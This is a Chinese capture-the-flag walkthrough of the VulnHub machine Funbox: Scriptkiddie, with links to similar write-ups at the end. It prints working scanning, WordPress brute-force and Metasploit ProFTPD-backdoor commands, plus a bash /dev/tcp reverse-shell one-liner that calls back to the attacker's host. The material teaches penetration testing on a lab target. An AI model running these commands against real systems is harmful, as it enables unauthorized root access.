vulnhub--Funbox: Scriptkiddie
靶机介绍
Difficult: As always, it’s a very easy box for beginners.
Goal: Get flag
Download:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/
信息探测
主机发现
netdiscover -i eth0 -r 192.168.0.128/24
端口扫描
nmap -sV -p- -A 192.168.0.131
nmap扫描结果
- 并不能用 anonymous 访问FTP服务,这里就不进行FTP的暴力破解了;
- 网站是用WordPress搭建的,可以使用wpscan进行检测,可以进行用户名和密码的枚举
添加hosts
由于靶机作者提示了 Add to your /etc/hosts: funbox11
,因此将内容添加至hosts文件中
目录扫描
gobuster dir -u http://funbox11/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "php,txt,zip,html" -t 200
获取网站Webshell
访问网站主页
使用wpscan 进行用户名和密码的枚举
枚举用户名
wpscan --url http://funbox11/ --enumerate u
枚举密码
wpscan --url http://funbox11/ --passwords /usr/share/wordlists/rockyou.txt --usernames admin -t 5
时间有点久,也可能爆破不出来,就不爆破了
ProFTPD 1.3.3c 后门命令执行漏洞
在端口扫描中可以得知FTP 服务使用的版本是 ProFTPD 1.3.3c,这个版本存在命令执行漏洞,在kali中寻找exp
searchsploit proftpd
有一个metasploit版本的exp
metasploit执行漏洞
use exploit/unix/ftp/proftpd_133c_backdoor
show options
set RHOSTS 192.168.0.131
show payloads
set payload payload/cmd/unix/reverse
show options
set LHOST 192.168.0.128
exploit
得到的是一个root权限,在这里可以直接得到flag,也可以通过执行一个反弹shell来得到一个连接
执行反弹shell
开启一个监听
在metasploit中执行
bash -c 'bash -i >& /dev/tcp/192.168.0.128/9001 0>&1'
得到连接
得到flag
总结
- nmap扫描
- wpscan
- ProFTPD-1.3.3c 漏洞
vulnhub--Funbox: Scriptkiddie相关推荐
- 靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie
一.环境搭建 靶官网机下载地址:Funbox: Scriptkiddie ~ VulnHub 百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9 二.信息收集 1.nmap命令扫描靶机 先 ...
- vulnhub Funbox: 1
渗透思路: nmap扫描----wpscan爆破网站用户名和密码----joe用户ssh登录并绕过rbash----文件权限777定时任务提权(多个用户定时任务执行同一个文件) 环境信息: 靶机:19 ...
- vulnhub Funbox: Under Construction
环境搭建: Funbox: Under Construction! ~ VulnHub 漏洞复现: 探测靶机的IP地址 nmap进行探测靶机的服务和端口 访问80端口 dirb扫描目录,发现catal ...
- VulnHub FunBox Writeup
FunBox详情请见:https://www.vulnhub.com/entry/funbox-1,518/ 靶机使用VirtualBox搭建,连接VirtualBox Host-Only网卡,IP为 ...
- 靶机渗透练习25-Funbox4-CTF
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-ctf,546/ Description Groundhog Day: Boot2Root ! Initi ...
- 【每日打靶练习】vulnhub靶机平台--Funbox2(低)
Funbox靶场练习--低 0x00部署 0x01信息收集 1.主机发现 2.端口扫描 3.信息收集 0x03漏洞挖掘 1.FTP服务漏洞 2.密码爆破(john) 3.SSH公钥认证 4.rbash ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox4(CTF)
Vulnhub靶机FunBox4(CTF)渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:文件上传 Get ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox3(Easy)
Vulnhub靶机FunBox3(Easy)渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:网站渗透Get ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox10(Under Construction)
Vulnhub靶机FunBox10(Under Construction)渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①: ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox7( EASYENUM)
Vulnhub靶机FunBox7(EASYENUM)渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:文件上 ...
最新文章
- encodeURIComponent或者encodeURI 不用行不行?
- 什么是方向图乘积定理_课本上没有,但十分好用的初中数学定理公式
- python和docker交互_jupyter notebook 连接服务器docker中python环境
- java程序员闯关题网站_Java程序员每周必逛的十大学习网站
- 在bash脚本中进行浮点运算
- oracle 性能优化 常用,Oracle數據庫常用性能優化
- Python3 数据库连接
- php生成excel范例,支持任意行列
- rel=alternate stylesheet属性
- macOS Big Sur新增小组件介绍
- 【聚沙成塔】将Mon Jun 01 2020 00:00:00 GMT+0800 (中国标准时间) 转换为 2020-06
- bigemap如何添加第三方地图
- markDown 下载安装教程
- python空气质量指数计算_Python的学习笔记案例8--空气质量指数计算5.0
- 【好工具】安利一款优秀的图片浏览器
- 在最熟知的芯片,解析最不为人知的秘密--Nordic的蓝牙芯片nRF52832。
- 基于bibtex的文献管理(详细)
- 云计算面临的安全威胁,主要来自于哪几个方面?
- 移动接入及核心网与移动回传网无信息交互,造成资源浪费
- 网络安全——应急响应之入侵排查